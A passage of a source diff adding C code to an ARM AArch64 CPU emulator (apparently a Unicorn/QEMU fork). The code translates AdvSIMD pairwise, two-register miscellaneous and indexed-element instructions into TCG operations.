tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_rn, off, esize); + } + } + write_vec_element(s, tcg_rd, rd, 0, MO_64); + write_vec_element(s, tcg_rd_hi, rd, 1, MO_64); + + tcg_temp_free_i64(tcg_ctx, tcg_rd_hi); + tcg_temp_free_i64(tcg_ctx, tcg_rd); + tcg_temp_free_i64(tcg_ctx, tcg_rn); + } +} + +static void handle_2misc_pairwise(DisasContext *s, int opcode, bool u, + bool is_q, int size, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* Implement the pairwise operations from 2-misc: + * SADDLP, UADDLP, SADALP, UADALP. + * These all add pairs of elements in the input to produce a + * double-width result element in the output (possibly accumulating). + */ + bool accum = (opcode == 0x6); + int maxpass = is_q ? 2 : 1; + int pass; + TCGv_i64 tcg_res[2]; + + if (size == 2) { + /* 32 + 32 -> 64 op */ + TCGMemOp memop = size + (u ? 0 : MO_SIGN); + + for (pass = 0; pass < maxpass; pass++) { + TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); + + tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_op1, rn, pass * 2, memop); + read_vec_element(s, tcg_op2, rn, pass * 2 + 1, memop); + tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); + if (accum) { + read_vec_element(s, tcg_op1, rd, pass, MO_64); + tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_op1); + } + + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + } + } else { + for (pass = 0; pass < maxpass; pass++) { + TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); + NeonGenOneOpFn *genfn; + static NeonGenOneOpFn * const fns[2][2] = { + { gen_helper_neon_addlp_s8, gen_helper_neon_addlp_u8 }, + { gen_helper_neon_addlp_s16, gen_helper_neon_addlp_u16 }, + }; + + genfn = fns[size][u]; + + tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_op, rn, pass, MO_64); + genfn(tcg_ctx, tcg_res[pass], tcg_op); + + if (accum) { + read_vec_element(s, tcg_op, rd, pass, MO_64); + if (size == 0) { + gen_helper_neon_addl_u16(tcg_ctx, tcg_res[pass], + tcg_res[pass], tcg_op); + } else { + gen_helper_neon_addl_u32(tcg_ctx, tcg_res[pass], + tcg_res[pass], tcg_op); + } + } + tcg_temp_free_i64(tcg_ctx, tcg_op); + } + } + if (!is_q) { + tcg_res[1] = tcg_const_i64(tcg_ctx, 0); + } + for (pass = 0; pass < 2; pass++) { + write_vec_element(s, tcg_res[pass], rd, pass, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); + } +} + +static void handle_shll(DisasContext *s, bool is_q, int size, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* Implement SHLL and SHLL2 */ + int pass; + int part = is_q ? 2 : 0; + TCGv_i64 tcg_res[2]; + + for (pass = 0; pass < 2; pass++) { + static NeonGenWidenFn * const widenfns[3] = { + gen_helper_neon_widen_u8, + gen_helper_neon_widen_u16, + tcg_gen_extu_i32_i64, + }; + NeonGenWidenFn *widenfn = widenfns[size]; + TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); + + read_vec_element_i32(s, tcg_op, rn, part + pass, MO_32); + tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); + widenfn(tcg_ctx, tcg_res[pass], tcg_op); + tcg_gen_shli_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], 8 << size); + + tcg_temp_free_i32(tcg_ctx, tcg_op); + } + + for (pass = 0; pass < 2; pass++) { + write_vec_element(s, tcg_res[pass], rd, pass, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); + } +} + +/* C3.6.17 AdvSIMD two reg misc + * 31 30 29 28 24 23 22 21 17 16 12 11 10 9 5 4 0 + * +---+---+---+-----------+------+-----------+--------+-----+------+------+ + * | 0 | Q | U | 0 1 1 1 0 | size | 1 0 0 0 0 | opcode | 1 0 | Rn | Rd | + * +---+---+---+-----------+------+-----------+--------+-----+------+------+ + */ +static void disas_simd_two_reg_misc(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = extract32(insn, 22, 2); + int opcode = extract32(insn, 12, 5); + bool u = extract32(insn, 29, 1); + bool is_q = extract32(insn, 30, 1); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + bool need_fpstatus = false; + bool need_rmode = false; + int rmode = -1; + TCGv_i32 tcg_rmode; + TCGv_ptr tcg_fpstatus; + + switch (opcode) { + case 0x0: /* REV64, REV32 */ + case 0x1: /* REV16 */ + handle_rev(s, opcode, u, is_q, size, rn, rd); + return; + case 0x5: /* CNT, NOT, RBIT */ + if (u && size == 0) { + /* NOT: adjust size so we can use the 64-bits-at-a-time loop. */ + size = 3; + break; + } else if (u && size == 1) { + /* RBIT */ + break; + } else if (!u && size == 0) { + /* CNT */ + break; + } + unallocated_encoding(s); + return; + case 0x12: /* XTN, XTN2, SQXTUN, SQXTUN2 */ + case 0x14: /* SQXTN, SQXTN2, UQXTN, UQXTN2 */ + if (size == 3) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + + handle_2misc_narrow(s, false, opcode, u, is_q, size, rn, rd); + return; + case 0x4: /* CLS, CLZ */ + if (size == 3) { + unallocated_encoding(s); + return; + } + break; + case 0x2: /* SADDLP, UADDLP */ + case 0x6: /* SADALP, UADALP */ + if (size == 3) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_2misc_pairwise(s, opcode, u, is_q, size, rn, rd); + return; + case 0x13: /* SHLL, SHLL2 */ + if (u == 0 || size == 3) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_shll(s, is_q, size, rn, rd); + return; + case 0xa: /* CMLT */ + if (u == 1) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x8: /* CMGT, CMGE */ + case 0x9: /* CMEQ, CMLE */ + case 0xb: /* ABS, NEG */ + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + break; + case 0x3: /* SUQADD, USQADD */ + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_2misc_satacc(s, false, u, is_q, size, rn, rd); + return; + case 0x7: /* SQABS, SQNEG */ + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + break; + case 0x0c: case 0x0d: case 0x0e: case 0x0f: + case 0x16: case 0x17: case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: + case 0x1f: + { + /* Floating point: U, size[1] and opcode indicate operation; + * size[0] indicates single or double precision. + */ + int is_double = extract32(size, 0, 1); + opcode |= (extract32(size, 1, 1) << 5) | (u << 6); + size = is_double ? 3 : 2; + switch (opcode) { + case 0x2f: /* FABS */ + case 0x6f: /* FNEG */ + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + break; + case 0x1d: /* SCVTF */ + case 0x5d: /* UCVTF */ + { + bool is_signed = (opcode == 0x1d) ? true : false; + int elements = is_double ? 2 : is_q ? 4 : 2; + if (is_double && !is_q) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_simd_intfp_conv(s, rd, rn, elements, is_signed, 0, size); + return; + } + case 0x2c: /* FCMGT (zero) */ + case 0x2d: /* FCMEQ (zero) */ + case 0x2e: /* FCMLT (zero) */ + case 0x6c: /* FCMGE (zero) */ + case 0x6d: /* FCMLE (zero) */ + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + handle_2misc_fcmp_zero(s, opcode, false, u, is_q, size, rn, rd); + return; + case 0x7f: /* FSQRT */ + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + break; + case 0x1a: /* FCVTNS */ + case 0x1b: /* FCVTMS */ + case 0x3a: /* FCVTPS */ + case 0x3b: /* FCVTZS */ + case 0x5a: /* FCVTNU */ + case 0x5b: /* FCVTMU */ + case 0x7a: /* FCVTPU */ + case 0x7b: /* FCVTZU */ + need_fpstatus = true; + need_rmode = true; + rmode = extract32(opcode, 5, 1) | (extract32(opcode, 0, 1) << 1); + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + break; + case 0x5c: /* FCVTAU */ + case 0x1c: /* FCVTAS */ + need_fpstatus = true; + need_rmode = true; + rmode = FPROUNDING_TIEAWAY; + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + break; + case 0x3c: /* URECPE */ + if (size == 3) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x3d: /* FRECPE */ + case 0x7d: /* FRSQRTE */ + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_2misc_reciprocal(s, opcode, false, u, is_q, size, rn, rd); + return; + case 0x56: /* FCVTXN, FCVTXN2 */ + if (size == 2) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x16: /* FCVTN, FCVTN2 */ + /* handle_2misc_narrow does a 2*size -> size operation, but these + * instructions encode the source size rather than dest size. + */ + if (!fp_access_check(s)) { + return; + } + handle_2misc_narrow(s, false, opcode, 0, is_q, size - 1, rn, rd); + return; + case 0x17: /* FCVTL, FCVTL2 */ + if (!fp_access_check(s)) { + return; + } + handle_2misc_widening(s, opcode, is_q, size, rn, rd); + return; + case 0x18: /* FRINTN */ + case 0x19: /* FRINTM */ + case 0x38: /* FRINTP */ + case 0x39: /* FRINTZ */ + need_rmode = true; + rmode = extract32(opcode, 5, 1) | (extract32(opcode, 0, 1) << 1); + /* fall through */ + case 0x59: /* FRINTX */ + case 0x79: /* FRINTI */ + need_fpstatus = true; + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + break; + case 0x58: /* FRINTA */ + need_rmode = true; + rmode = FPROUNDING_TIEAWAY; + need_fpstatus = true; + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + break; + case 0x7c: /* URSQRTE */ + if (size == 3) { + unallocated_encoding(s); + return; + } + need_fpstatus = true; + break; + default: + unallocated_encoding(s); + return; + } + break; + } + default: + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + if (need_fpstatus) { + tcg_fpstatus = get_fpstatus_ptr(tcg_ctx); + } else { + TCGV_UNUSED_PTR(tcg_fpstatus); + } + if (need_rmode) { + tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + } else { + TCGV_UNUSED_I32(tcg_rmode); + } + + if (size == 3) { + /* All 64-bit element operations can be shared with scalar 2misc */ + int pass; + + for (pass = 0; pass < (is_q ? 2 : 1); pass++) { + TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_op, rn, pass, MO_64); + + handle_2misc_64(s, opcode, u, tcg_res, tcg_op, + tcg_rmode, tcg_fpstatus); + + write_vec_element(s, tcg_res, rd, pass, MO_64); + + tcg_temp_free_i64(tcg_ctx, tcg_res); + tcg_temp_free_i64(tcg_ctx, tcg_op); + } + } else { + int pass; + + for (pass = 0; pass < (is_q ? 4 : 2); pass++) { + TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); + TCGCond cond; + + read_vec_element_i32(s, tcg_op, rn, pass, MO_32); + + if (size == 2) { + /* Special cases for 32 bit elements */ + switch (opcode) { + case 0xa: /* CMLT */ + /* 32 bit integer comparison against zero, result is + * test ? (2^32 - 1) : 0. We implement via setcond(test) + * and inverting. + */ + cond = TCG_COND_LT; + do_cmop: + tcg_gen_setcondi_i32(tcg_ctx, cond, tcg_res, tcg_op, 0); + tcg_gen_neg_i32(tcg_ctx, tcg_res, tcg_res); + break; + case 0x8: /* CMGT, CMGE */ + cond = u ? TCG_COND_GE : TCG_COND_GT; + goto do_cmop; + case 0x9: /* CMEQ, CMLE */ + cond = u ? TCG_COND_LE : TCG_COND_EQ; + goto do_cmop; + case 0x4: /* CLS */ + if (u) { + gen_helper_clz32(tcg_ctx, tcg_res, tcg_op); + } else { + gen_helper_cls32(tcg_ctx, tcg_res, tcg_op); + } + break; + case 0x7: /* SQABS, SQNEG */ + if (u) { + gen_helper_neon_qneg_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op); + } else { + gen_helper_neon_qabs_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op); + } + break; + case 0xb: /* ABS, NEG */ + if (u) { + tcg_gen_neg_i32(tcg_ctx, tcg_res, tcg_op); + } else { + TCGv_i32 tcg_zero = tcg_const_i32(tcg_ctx, 0); + tcg_gen_neg_i32(tcg_ctx, tcg_res, tcg_op); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GT, tcg_res, tcg_op, + tcg_zero, tcg_op, tcg_res); + tcg_temp_free_i32(tcg_ctx, tcg_zero); + } + break; + case 0x2f: /* FABS */ + gen_helper_vfp_abss(tcg_ctx, tcg_res, tcg_op); + break; + case 0x6f: /* FNEG */ + gen_helper_vfp_negs(tcg_ctx, tcg_res, tcg_op); + break; + case 0x7f: /* FSQRT */ + gen_helper_vfp_sqrts(tcg_ctx, tcg_res, tcg_op, tcg_ctx->cpu_env); + break; + case 0x1a: /* FCVTNS */ + case 0x1b: /* FCVTMS */ + case 0x1c: /* FCVTAS */ + case 0x3a: /* FCVTPS */ + case 0x3b: /* FCVTZS */ + { + TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); + gen_helper_vfp_tosls(tcg_ctx, tcg_res, tcg_op, + tcg_shift, tcg_fpstatus); + tcg_temp_free_i32(tcg_ctx, tcg_shift); + break; + } + case 0x5a: /* FCVTNU */ + case 0x5b: /* FCVTMU */ + case 0x5c: /* FCVTAU */ + case 0x7a: /* FCVTPU */ + case 0x7b: /* FCVTZU */ + { + TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); + gen_helper_vfp_touls(tcg_ctx, tcg_res, tcg_op, + tcg_shift, tcg_fpstatus); + tcg_temp_free_i32(tcg_ctx, tcg_shift); + break; + } + case 0x18: /* FRINTN */ + case 0x19: /* FRINTM */ + case 0x38: /* FRINTP */ + case 0x39: /* FRINTZ */ + case 0x58: /* FRINTA */ + case 0x79: /* FRINTI */ + gen_helper_rints(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); + break; + case 0x59: /* FRINTX */ + gen_helper_rints_exact(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); + break; + case 0x7c: /* URSQRTE */ + gen_helper_rsqrte_u32(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); + break; + default: + g_assert_not_reached(); + } + } else { + /* Use helpers for 8 and 16 bit elements */ + switch (opcode) { + case 0x5: /* CNT, RBIT */ + /* For these two insns size is part of the opcode specifier + * (handled earlier); they always operate on byte elements. + */ + if (u) { + gen_helper_neon_rbit_u8(tcg_ctx, tcg_res, tcg_op); + } else { + gen_helper_neon_cnt_u8(tcg_ctx, tcg_res, tcg_op); + } + break; + case 0x7: /* SQABS, SQNEG */ + { + NeonGenOneOpEnvFn *genfn; + static NeonGenOneOpEnvFn * const fns[2][2] = { + { gen_helper_neon_qabs_s8, gen_helper_neon_qneg_s8 }, + { gen_helper_neon_qabs_s16, gen_helper_neon_qneg_s16 }, + }; + genfn = fns[size][u]; + genfn(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op); + break; + } + case 0x8: /* CMGT, CMGE */ + case 0x9: /* CMEQ, CMLE */ + case 0xa: /* CMLT */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_cgt_s8, gen_helper_neon_cgt_s16 }, + { gen_helper_neon_cge_s8, gen_helper_neon_cge_s16 }, + { gen_helper_neon_ceq_u8, gen_helper_neon_ceq_u16 }, + }; + NeonGenTwoOpFn *genfn; + int comp; + bool reverse; + TCGv_i32 tcg_zero = tcg_const_i32(tcg_ctx, 0); + + /* comp = index into [CMGT, CMGE, CMEQ, CMLE, CMLT] */ + comp = (opcode - 0x8) * 2 + u; + /* ...but LE, LT are implemented as reverse GE, GT */ + reverse = (comp > 2); + if (reverse) { + comp = 4 - comp; + } + genfn = fns[comp][size]; + if (reverse) { + genfn(tcg_ctx, tcg_res, tcg_zero, tcg_op); + } else { + genfn(tcg_ctx, tcg_res, tcg_op, tcg_zero); + } + tcg_temp_free_i32(tcg_ctx, tcg_zero); + break; + } + case 0xb: /* ABS, NEG */ + if (u) { + TCGv_i32 tcg_zero = tcg_const_i32(tcg_ctx, 0); + if (size) { + gen_helper_neon_sub_u16(tcg_ctx, tcg_res, tcg_zero, tcg_op); + } else { + gen_helper_neon_sub_u8(tcg_ctx, tcg_res, tcg_zero, tcg_op); + } + tcg_temp_free_i32(tcg_ctx, tcg_zero); + } else { + if (size) { + gen_helper_neon_abs_s16(tcg_ctx, tcg_res, tcg_op); + } else { + gen_helper_neon_abs_s8(tcg_ctx, tcg_res, tcg_op); + } + } + break; + case 0x4: /* CLS, CLZ */ + if (u) { + if (size == 0) { + gen_helper_neon_clz_u8(tcg_ctx, tcg_res, tcg_op); + } else { + gen_helper_neon_clz_u16(tcg_ctx, tcg_res, tcg_op); + } + } else { + if (size == 0) { + gen_helper_neon_cls_s8(tcg_ctx, tcg_res, tcg_op); + } else { + gen_helper_neon_cls_s16(tcg_ctx, tcg_res, tcg_op); + } + } + break; + default: + g_assert_not_reached(); + } + } + + write_vec_element_i32(s, tcg_res, rd, pass, MO_32); + + tcg_temp_free_i32(tcg_ctx, tcg_res); + tcg_temp_free_i32(tcg_ctx, tcg_op); + } + } + if (!is_q) { + clear_vec_high(s, rd); + } + + if (need_rmode) { + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + } + if (need_fpstatus) { + tcg_temp_free_ptr(tcg_ctx, tcg_fpstatus); + } +} + +/* C3.6.13 AdvSIMD scalar x indexed element + * 31 30 29 28 24 23 22 21 20 19 16 15 12 11 10 9 5 4 0 + * +-----+---+-----------+------+---+---+------+-----+---+---+------+------+ + * | 0 1 | U | 1 1 1 1 1 | size | L | M | Rm | opc | H | 0 | Rn | Rd | + * +-----+---+-----------+------+---+---+------+-----+---+---+------+------+ + * C3.6.18 AdvSIMD vector x indexed element + * 31 30 29 28 24 23 22 21 20 19 16 15 12 11 10 9 5 4 0 + * +---+---+---+-----------+------+---+---+------+-----+---+---+------+------+ + * | 0 | Q | U | 0 1 1 1 1 | size | L | M | Rm | opc | H | 0 | Rn | Rd | + * +---+---+---+-----------+------+---+---+------+-----+---+---+------+------+ + */ +static void disas_simd_indexed(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* This encoding has two kinds of instruction: + * normal, where we perform elt x idxelt => elt for each + * element in the vector + * long, where we perform elt x idxelt and generate a result of + * double the width of the input element + * The long ops have a 'part' specifier (ie come in INSN, INSN2 pairs). + */ + bool is_scalar = extract32(insn, 28, 1); + bool is_q = extract32(insn, 30, 1); + bool u = extract32(insn, 29, 1); + int size = extract32(insn, 22, 2); + int l = extract32(insn, 21, 1); + int m = extract32(insn, 20, 1); + /* Note that the Rm field here is only 4 bits, not 5 as it usually is */ + int rm = extract32(insn, 16, 4); + int opcode = extract32(insn, 12, 4); + int h = extract32(insn, 11, 1); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + bool is_long = false; + bool is_fp = false; + int index; + TCGv_ptr fpst; + + switch (opcode) { + case 0x0: /* MLA */ + case 0x4: /* MLS */ + if (!u || is_scalar) { + unallocated_encoding(s); + return; + } + break; + case 0x2: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ + case 0x6: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ + case 0xa: /* SMULL, SMULL2, UMULL, UMULL2 */ + if (is_scalar) { + unallocated_encoding(s); + return; + } + is_long = true; + break; + case 0x3: /* SQDMLAL, SQDMLAL2 */ + case 0x7: /* SQDMLSL, SQDMLSL2 */ + case 0xb: /* SQDMULL, SQDMULL2 */ + is_long = true; + /* fall through */ + case 0xc: /* SQDMULH */ + case 0xd: /* SQRDMULH */ + if (u) { + unallocated_encoding(s); + return; + } + break; + case 0x8: /* MUL */ + if (u || is_scalar) { + unallocated_encoding(s); + return; + } + break; + case 0x1: /* FMLA */ + case 0x5: /* FMLS */ + if (u) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x9: /* FMUL, FMULX */ + if (!extract32(size, 1, 1)) { + unallocated_encoding(s); + return; + } + is_fp = true; + break; + default: + unallocated_encoding(s); + return; + } + + if (is_fp) { + /* low bit of size indicates single/double */ + size = extract32(size, 0, 1) ? 3 : 2; + if (size == 2) { + index = h << 1 | l; + } else { + if (l || !is_q) { + unallocated_encoding(s); + return; + } + index = h; + } + rm |= (m << 4); + } else { + switch (size) { + case 1: + index = h << 2 | l << 1 | m; + break; + case 2: + index = h << 1 | l; + rm |= (m << 4); + break; + default: + unallocated_encoding(s); + return; + } + } + + if (!fp_access_check(s)) { + return; + } + + if (is_fp) { + fpst = get_fpstatus_ptr(tcg_ctx); + } else { + TCGV_UNUSED_PTR(fpst); + } + + if (size == 3) { + TCGv_i64 tcg_idx = tcg_temp_new_i64(tcg_ctx); + int pass; + + assert(is_fp && is_q && !is_long); + + read_vec_element(s, tcg_idx, rm, index, MO_64); + + for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { + TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_op, rn, pass, MO_64); + + switch (opcode) { + case 0x5: /* FMLS */ + /* As usual for ARM, separate negation for fused multiply-add */ + gen_helper_vfp_negd(tcg_ctx, tcg_op, tcg_op); + /* fall through */ + case 0x1: /* FMLA */ + read_vec_element(s, tcg_res, rd, pass, MO_64); + gen_helper_vfp_muladdd(tcg_ctx, tcg_res, tcg_op, tcg_idx, tcg_res, fpst); + break; + case 0x9: /* FMUL, FMULX */ + if (u) { + gen_helper_vfp_mulxd(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); + } else { + gen_helper_vfp_muld(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); + } + break; + default: + g_assert_not_reached(); + } + + write_vec_element(s, tcg_res, rd, pass, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_op); + tcg_temp_free_i64(tcg_ctx, tcg_res); + } + + if (is_scalar) { + clear_vec_high(s, rd); + } + + tcg_temp_free_i64(tcg_ctx, tcg_idx); + } else if (!is_long) { + /* 32 bit floating point, or 16 or 32 bit integer. + * For the 16 bit scalar case we use the usual Neon helpers and + * rely on the fact that 0 op 0 == 0 with no side effects. + */ + TCGv_i32 tcg_idx = tcg_temp_new_i32(tcg_ctx); + int pass, maxpasses; + + if (is_scalar) { + maxpasses = 1; + } else { + maxpasses = is_q ? 4 : 2; + } + + read_vec_element_i32(s, tcg_idx, rm, index, size); + + if (size == 1 && !is_scalar) { + /* The simplest way to handle the 16x16 indexed ops is to duplicate + * the index into both halves of the 32 bit tcg_idx and then use + * the usual Neon helpers. + */ + tcg_gen_deposit_i32(tcg_ctx, tcg_idx, tcg_idx, tcg_idx, 16, 16); + } + + for (pass = 0; pass < maxpasses; pass++) { + TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); + + read_vec_element_i32(s, tcg_op, rn, pass, is_scalar ? size : MO_32); + + switch (opcode) { + case 0x0: /* MLA */ + case 0x4: /* MLS */ + case 0x8: /* MUL */ + { + static NeonGenTwoOpFn * const fns[2][2] = { + { gen_helper_neon_add_u16, gen_helper_neon_sub_u16 }, + { tcg_gen_add_i32, tcg_gen_sub_i32 }, + }; + NeonGenTwoOpFn *genfn; + bool is_sub = opcode == 0x4; + + if (size == 1) { + gen_helper_neon_mul_u16(tcg_ctx, tcg_res, tcg_op, tcg_idx); + } else { + tcg_gen_mul_i32(tcg_ctx, tcg_res, tcg_op, tcg_idx); + } + if (opcode == 0x8) { + break; + } + read_vec_element_i32(s, tcg_op, rd, pass, MO_32); + genfn = fns[size - 1][is_sub]; + genfn(tcg_ctx, tcg_res, tcg_op, tcg_res); + break; + } + case 0x5: /* FMLS */ + /* As usual for ARM, separate negation for fused multiply-add */ + gen_helper_vfp_negs(tcg_ctx, tcg_op, tcg_op); + /* fall through */ + case 0x1: /* FMLA */ + read_vec_element_i32(s, tcg_res, rd, pass, MO_32); + gen_helper_vfp_muladds(tcg_ctx, tcg_res, tcg_op, tcg_idx, tcg_res, fpst); + break; + case 0x9: /* FMUL, FMULX */ + if (u) { + gen_helper_vfp_mulxs(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); + } else { + gen_helper_vfp_muls(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); + } + break; + case 0xc: /* SQDMULH */ + if (size == 1) { + gen_helper_neon_qdmulh_s16(tcg_ctx, tcg_res, tcg_ctx->cpu_env, + tcg_op, tcg_idx); + } else { + gen_helper_neon_qdmulh_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, + tcg_op, tcg_idx); + } + break; + case 0xd: /* SQRDMULH */ + if (size == 1) { + gen_helper_neon_qrdmulh_s16(tcg_ctx, tcg_res, tcg_ctx->cpu_env, + tcg_op, tcg_idx); + } else { + gen_helper_neon_qrdmulh_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, + tcg_op, tcg_idx); + } + break; + default: + g_assert_not_reached(); + } + + if (is_scalar) { + write_fp_sreg(s, rd, tcg_res); + } else { + write_vec_element_i32(s, tcg_res, rd, pass, MO_32); + } + + tcg_temp_free_i32(tcg_ctx, tcg_op); + tcg_temp_free_i32(tcg_ctx, tcg_res); + } + + tcg_temp_free_i32(tcg_ctx, tcg_idx); + + if (!is_q) { + clear_vec_high(s, rd); + } + } else { + /* long ops: 16x16->32 or 32x32->64 */ + TCGv_i64 tcg_res[2]; + int pass; + bool satop = extract32(opcode, 0, 1); + TCGMemOp memop = MO_32; + + if (satop || !u) { + memop |= MO_SIGN; + } + + if (size == 2) { + TCGv_i64 tcg_idx = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_idx, rm, index, memop); + + for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { + TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_passres; + int passelt; + + if (is_scalar) { + passelt = 0; + } else { + passelt = pass + (is_q * 2); + } + + read_vec_element(s, tcg_op, rn, passelt, memop); + + tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); + + if (opcode == 0xa || opcode == 0xb) { + /* Non-accumulating ops */ + tcg_passres = tcg_res[pass]; + } else { + tcg_passres = tcg_temp_new_i64(tcg_ctx); + } + + tcg_gen_mul_i64(tcg_ctx, tcg_passres, tcg_op, tcg_idx); + tcg_temp_free_i64(tcg_ctx, tcg_op); + + if (satop) { + /* saturating, doubling */ + gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_passres, tcg_ctx->cpu_env, + tcg_passres, tcg_passres); + } + + if (opcode == 0xa || opcode == 0xb) { + continue; + } + + /* Accumulating op: handle accumulate step */ + read_vec_element(s, tcg_res[pass], rd, pass, MO_64); + + switch (opcode) { + case 0x2: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ + tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); + break; + case 0x6: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ + tcg_gen_sub_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); + break; + case 0x7: /* SQDMLSL, SQDMLSL2 */ + tcg_gen_neg_i64(tcg_ctx, tcg_passres, tcg_passres); + /* fall through */ + case 0x3: /* SQDMLAL, SQDMLAL2 */ + gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, + tcg_res[pass], + tcg_passres); + break; + default: + g_assert_not_reached(); + } + tcg_temp_free_i64(tcg_ctx, tcg_passres); + } + tcg_temp_free_i64(tcg_ctx, tcg_idx); + + if (is_scalar) { + clear_vec_high(s, rd); + } + } else { + TCGv_i32 tcg_idx = tcg_temp_new_i32(tcg_ctx); + + assert(size == 1); + read_vec_element_i32(s, tcg_idx, rm, index, size); + + if (!is_scalar) { + /* The simplest way to handle the 16x16 indexed ops is to + * duplicate the index into both halves of the 32 bit tcg_idx + * and then use the usual Neon helpers. + */ + tcg_gen_deposit_i32(tcg_ctx, tcg_idx, tcg_idx, tcg_idx, 16, 16); + } + + for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { + TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 tcg_passres; + + if (is_scalar) { + read_vec_element_i32(s, tcg_op, rn, pass, size); + } else { + read_vec_element_i32(s, tcg_op, rn, + pass + (is_q * 2), MO_32); + } + + tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); + + if (opcode == 0xa || opcode == 0xb) { + /* Non-accumulating ops */ + tcg_passres = tcg_res[pass]; + } else { + tcg_passres = tcg_temp_new_i64(tcg_ctx); + } + + if (memop & MO_SIGN) { + gen_helper_neon_mull_s16(tcg_ctx, tcg_passres, tcg_op, tcg_idx); + } else { + 